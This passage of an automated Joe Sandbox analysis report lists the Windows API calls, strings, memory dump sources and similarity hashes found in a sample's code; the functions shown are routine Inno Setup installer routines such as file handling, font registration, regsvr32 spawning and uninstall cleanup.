                                                                                            • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                                                            • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                                                            • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                                                            • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                                                            • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                                                            • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                                                            • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                            • String ID:
                                                                                            • API String ID: 1694776339-0
                                                                                            • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                            • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                                                            • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                            • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
APIs
• GetSystemMenu.USER32(00000000,00000000), ref: 00422243
• DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422261
• DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226E
• DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042227B
• DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422288
• DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422295
• DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 004222A2
• DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 004222AF
• EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222CD
• EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222E9
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: Menu$Delete$EnableItem$System
• String ID:
• API String ID: 3985193851-0
• Opcode ID: 02d38efaefe46f0e9bc3abe3cfd80dc8f7ad5e6e4bcf4392d2612e5af0a0388e
• Instruction ID: b791af981bedf3385b2dd143af085cc0c004e448fbd85fce69a0ff0a91ac5271
• Opcode Fuzzy Hash: 02d38efaefe46f0e9bc3abe3cfd80dc8f7ad5e6e4bcf4392d2612e5af0a0388e
• Instruction Fuzzy Hash: 35213370340744BAE720D725DD8BF9B7BD89B04718F4440A5BA487F2D7C7F9AA80869C
APIs
• WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453353
Strings
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: PrivateProfileStringWrite
• String ID: $pI$.tmp$MoveFileEx$NUL$WININIT.INI$[rename]$oI
• API String ID: 390214022-3415521383
• Opcode ID: 4cfdaec4cf45cb6b31dd2cede704c04f2930a939beeeeed92986428e7fe6f80d
• Instruction ID: ce58c644a57a5931bfb3eb4b41fd184989c95ed3aef939848703120becc63cdc
• Opcode Fuzzy Hash: 4cfdaec4cf45cb6b31dd2cede704c04f2930a939beeeeed92986428e7fe6f80d
• Instruction Fuzzy Hash: 22910734E0010DABDB11EFA5C852BDEB7B5EF49346F508467E800B7392D778AE498B58
APIs
• FreeLibrary.KERNEL32(10000000), ref: 0047FFC4
• FreeLibrary.KERNEL32(03100000), ref: 0047FFD8
• SendNotifyMessageA.USER32(00010440,00000496,00002710,00000000), ref: 0048004A
Strings
• DeinitializeSetup, xrefs: 0047FED5
• Not restarting Windows because Setup is being run from the debugger., xrefs: 0047FFF9
• Restarting Windows., xrefs: 00480025
• Deinitializing Setup., xrefs: 0047FE3A
• GetCustomSetupExitCode, xrefs: 0047FE79
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: FreeLibrary$MessageNotifySend
• String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
• API String ID: 3817813901-1884538726
• Opcode ID: 3e65ccf6202abbdfd793ce9802210bad3c829859d96f97b0f1010f0964bcdbc0
• Instruction ID: a364eb3419ca1f30a9e3eb44d73b76d56ae546640220791ead322ba595580ec3
• Opcode Fuzzy Hash: 3e65ccf6202abbdfd793ce9802210bad3c829859d96f97b0f1010f0964bcdbc0
• Instruction Fuzzy Hash: C351A1316002009FD721EB69F945B5A7BE4EB1A314F51847BF805C73A2DB389848CB99
APIs
• SHGetMalloc.SHELL32(?), ref: 00460DEF
• GetActiveWindow.USER32 ref: 00460E53
• CoInitialize.OLE32(00000000), ref: 00460E67
• SHBrowseForFolder.SHELL32(?), ref: 00460E7E
• CoUninitialize.OLE32(00460EBF,00000000,?,?,?,?,?,00000000,00460F43), ref: 00460E93
• SetActiveWindow.USER32(?,00460EBF,00000000,?,?,?,?,?,00000000,00460F43), ref: 00460EA9
• SetActiveWindow.USER32(?,?,00460EBF,00000000,?,?,?,?,?,00000000,00460F43), ref: 00460EB2
Strings
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
• String ID: A
• API String ID: 2684663990-3554254475
• Opcode ID: 2477b1493d95c66d93d73e99a730f240e77ae973ab02a92069b792ba0dab2901
• Instruction ID: e80b4c5213709972e599e89028d95aa00c835143d3680f9f001b64d6594dadc3
• Opcode Fuzzy Hash: 2477b1493d95c66d93d73e99a730f240e77ae973ab02a92069b792ba0dab2901
• Instruction Fuzzy Hash: 8C3130B0D00218AFDB01EFB6D885A9EBBF8EB09304F51447AF914F7251E7789A04CB59
APIs
• GetFileAttributesA.KERNEL32(00000000,00000000,00471A59,?,?,?,00000008,00000000,00000000,00000000,?,00471CB5,?,?,00000000,00471F1C), ref: 004719BC
  • Part of subcall function 0042CD60: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CDD6
  • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496BB5,00000000,00496C0A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
• SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00471A59,?,?,?,00000008,00000000,00000000,00000000,?,00471CB5), ref: 00471A33
• RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00471A59,?,?,?,00000008,00000000,00000000,00000000), ref: 00471A39
Strings
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
• String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
• API String ID: 884541143-1710247218
• Opcode ID: 166f044b85d341f0b6ee90afdeb19f2146d980d02c7b22180f5b46b241ce676d
• Instruction ID: 88fb20351202849850a9607c8ed9a5972d7e7c37514b441dc4b5c3053575b9e2
• Opcode Fuzzy Hash: 166f044b85d341f0b6ee90afdeb19f2146d980d02c7b22180f5b46b241ce676d
• Instruction Fuzzy Hash: 8111E2307005147BD711EA6ECC82B9E73ACDB45714FA1813BB405B72E1DB3C9E02865C
APIs
• GetProcAddress.KERNEL32(03100000,inflateInit_), ref: 0045C9DD
• GetProcAddress.KERNEL32(03100000,inflate), ref: 0045C9ED
• GetProcAddress.KERNEL32(03100000,inflateEnd), ref: 0045C9FD
• GetProcAddress.KERNEL32(03100000,inflateReset), ref: 0045CA0D
Strings
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: AddressProc
• String ID: inflate$inflateEnd$inflateInit_$inflateReset
• API String ID: 190572456-3516654456
• Opcode ID: 311722acbfa37a17bdf68912e4e87f1f7738553d6cb20796f4da0de6e3995170
• Instruction ID: ca09fd674ca76a7276795bdcbb2c408d45c762c24a12309d3e7b68c52f970bbc
• Opcode Fuzzy Hash: 311722acbfa37a17bdf68912e4e87f1f7738553d6cb20796f4da0de6e3995170
• Instruction Fuzzy Hash: A7011AB0901304DEEB14DF36BEC97273AA5E760B56F14D03B9C55992A2D7780848CB9C
APIs
• SetBkColor.GDI32(?,00000000), ref: 0041A9C9
• 73A14D40.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,00000000), ref: 0041AA03
• SetBkColor.GDI32(?,?), ref: 0041AA18
• StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA62
• SetTextColor.GDI32(00000000,00000000), ref: 0041AA6D
• SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA7D
• StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AABC
• SetTextColor.GDI32(00000000,00000000), ref: 0041AAC6
• SetBkColor.GDI32(00000000,?), ref: 0041AAD3
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: Color$StretchText
• String ID:
• API String ID: 2984075790-0
• Opcode ID: b6b7993ee34d591028293540005038157f95c366aa6f8393dbe83c10bd17739f
• Instruction ID: 2bdc14f7f78cb6bf094045e191087cf2cdbf471e5afceb3518b79a0be2d35765
• Opcode Fuzzy Hash: b6b7993ee34d591028293540005038157f95c366aa6f8393dbe83c10bd17739f
• Instruction Fuzzy Hash: 4E61E5B5A00105EFCB40EFADD985E9AB7F8AF08354B10816AF508DB261CB34ED44CF68
APIs
  • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
• CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00457470,?, /s ",?,regsvr32.exe",?,00457470), ref: 004573E2
Strings
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: CloseDirectoryHandleSystem
• String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
• API String ID: 2051275411-1862435767
• Opcode ID: baac78b6894afdadca5406328ae54855ea87cee56314610671aef23ecde7ca45
• Instruction ID: cb1a7ae3e697987e935249ccafc7b98f7c309c2d79f12e82178ec20c33fcefbe
• Opcode Fuzzy Hash: baac78b6894afdadca5406328ae54855ea87cee56314610671aef23ecde7ca45
• Instruction Fuzzy Hash: 73410670A043086BDB10EFD5D841B9DBBF9AF45305F50407BA918BB292D7789A09CB59
APIs
• OffsetRect.USER32(?,00000001,00000001), ref: 0044C9FD
• GetSysColor.USER32(00000014), ref: 0044CA04
• SetTextColor.GDI32(00000000,00000000), ref: 0044CA1C
• DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CA45
• OffsetRect.USER32(?,000000FF,000000FF), ref: 0044CA4F
• GetSysColor.USER32(00000010), ref: 0044CA56
• SetTextColor.GDI32(00000000,00000000), ref: 0044CA6E
• DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CA97
• DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CAC2
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: Text$Color$Draw$OffsetRect
• String ID:
• API String ID: 1005981011-0
• Opcode ID: 123096c916c42e02757bf989d00a9b95c02b0ee4bc6ed772870494fbc1b7a223
• Instruction ID: cbf23e484866fe7d62e86adeccfbc8e31d2d10e105370748ca703b53abdb5865
• Opcode Fuzzy Hash: 123096c916c42e02757bf989d00a9b95c02b0ee4bc6ed772870494fbc1b7a223
• Instruction Fuzzy Hash: 6821EFB42015047FC710FB2ACC8AE8B7BDCDF19319B01457A7918EB393C678DD408669
APIs
  • Part of subcall function 0044FF8C: SetEndOfFile.KERNEL32(?,?,0045BA62,00000000,0045BBED,?,00000000,00000002,00000002), ref: 0044FF93
  • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496BB5,00000000,00496C0A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
• GetWindowThreadProcessId.USER32(00000000,?), ref: 004949E1
• OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 004949F5
• SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 00494A0F
• WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00494A1B
• CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00494A21
• Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 00494A34
Strings
• Deleting Uninstall data files., xrefs: 00494957
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
• String ID: Deleting Uninstall data files.
• API String ID: 1570157960-2568741658
• Opcode ID: bec7e58c8e8652e4e27547219572b8e830921b9b91ef48d9c2f0a1ff48f1478a
• Instruction ID: d482532eb754b17a04c62f956e406d56ab6d113e5f4ee6e28585aa8da354e785
• Opcode Fuzzy Hash: bec7e58c8e8652e4e27547219572b8e830921b9b91ef48d9c2f0a1ff48f1478a
• Instruction Fuzzy Hash: 0E219170344204AEEB10EBBAFD42F1737A8D799718F10003BB5049A2E3D67C9C059B6D
APIs
  • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
• RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0046F2DD,?,?,?,?,00000000), ref: 0046F247
• RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0046F2DD), ref: 0046F25E
• AddFontResourceA.GDI32(00000000), ref: 0046F27B
• SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0046F28F
Strings
• AddFontResource, xrefs: 0046F299
• Failed to open Fonts registry key., xrefs: 0046F265
• Failed to set value in Fonts registry key., xrefs: 0046F250
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: CloseFontMessageNotifyOpenResourceSendValue
• String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
• API String ID: 955540645-649663873
• Opcode ID: 1264b81307f1a253542a8e0b58bb590f8fe1136343aa9e8d3130bb5ce7f1cb5f
• Instruction ID: 6d7729dfe4f1a7c8b63a61044efa00ce4130ce7f95034744da23bbcbb22f00e6
• Opcode Fuzzy Hash: 1264b81307f1a253542a8e0b58bb590f8fe1136343aa9e8d3130bb5ce7f1cb5f
• Instruction Fuzzy Hash: CC21B278B402007BDB10EBA6AC52F5E779CDB45704F604077B940EB3C2EA7D9D098A6E
APIs
  • Part of subcall function 00416420: GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
  • Part of subcall function 00416420: UnregisterClassA.USER32(?,00400000), ref: 004164BB
  • Part of subcall function 00416420: RegisterClassA.USER32(?), ref: 004164DE
• GetVersion.KERNEL32 ref: 00462588
• SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 004625C6
• SHGetFileInfo.SHELL32(00462664,00000000,?,00000160,00004011), ref: 004625E3
• LoadCursorA.USER32(00000000,00007F02), ref: 00462601
• SetCursor.USER32(00000000,00000000,00007F02,00462664,00000000,?,00000160,00004011), ref: 00462607
• SetCursor.USER32(?,00462647,00007F02,00462664,00000000,?,00000160,00004011), ref: 0046263A
Strings
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
• String ID: Explorer
• API String ID: 2594429197-512347832
• Opcode ID: 9e551b61376fb9e9f1f73c85b443bf32257c614818600361488d0c8e10dcc30c
• Instruction ID: 5d8862978945b954f1aea40d900f189da683ff410d790468fedd90432f5e16a2
• Opcode Fuzzy Hash: 9e551b61376fb9e9f1f73c85b443bf32257c614818600361488d0c8e10dcc30c
• Instruction Fuzzy Hash: DE21E7707407047AE725BB798D47F9A76D89B08708F50407FB605EA1C3E9BD8C1486AE
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02192BDC,?,?,?,02192BDC,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E31
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00476E37
• GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02192BDC,?,?,?,02192BDC,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E4A
• CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02192BDC,?,?,?,02192BDC), ref: 00476E74
• CloseHandle.KERNEL32(00000000,?,?,?,02192BDC,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E92
Strings
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: FileHandle$AddressAttributesCloseCreateModuleProc
• String ID: GetFinalPathNameByHandleA$kernel32.dll
• API String ID: 2704155762-2318956294
• Opcode ID: 8cfa0abb3559021c6ef5ceae513d3fa85427733fdb4d87d7d1e91b32a0a746f4
• Instruction ID: d2756be845a9a7cec8c09e5f4573334ab46b2fb936870a4cb364c11667d86bc7
• Opcode Fuzzy Hash: 8cfa0abb3559021c6ef5ceae513d3fa85427733fdb4d87d7d1e91b32a0a746f4
• Instruction Fuzzy Hash: E301D654340F0436EA30317A8C86FBB644E8B40769F158137BA1CEA2D2DAAC8D15127E
APIs
• GetLastError.KERNEL32(00000000,004596AE,?,00000000,00000000,00000000,?,00000006,?,00000000,00495CC7,?,00000000,00495D6A), ref: 004595F2
  • Part of subcall function 00453910: FindClose.KERNEL32(000000FF,00453A06), ref: 004539F5
Strings
• Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459667
• Deleting directory: %s, xrefs: 0045957B
• Stripped read-only attribute., xrefs: 004595B4
• Failed to strip read-only attribute., xrefs: 004595C0
• Failed to delete directory (%d)., xrefs: 00459688
• Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 004595CC
• Failed to delete directory (%d). Will retry later., xrefs: 0045960B
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: CloseErrorFindLast
• String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
• API String ID: 754982922-1448842058
